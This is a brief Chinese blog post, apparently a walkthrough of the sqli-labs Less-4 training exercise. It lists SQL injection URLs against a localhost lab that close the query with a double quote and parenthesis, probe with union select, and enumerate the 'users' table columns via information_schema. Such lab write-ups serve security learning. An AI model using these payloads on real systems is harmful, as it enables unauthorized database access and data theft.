时间:2021-07-01 10:21:17 帮助过:3人阅读
对应的GET请求
http://localhost/sqli/Less-4/?id=1")%23
http://localhost/sqli/Less-4/?id=a") union select 1,2,3%23
接下来又是走流程了
http://localhost/sqli/Less-4/?id=a") union select 1,2,column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 0,1%23
【sqli-labs】 less4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)
标签:color and security tab sqli local 基于 inf sql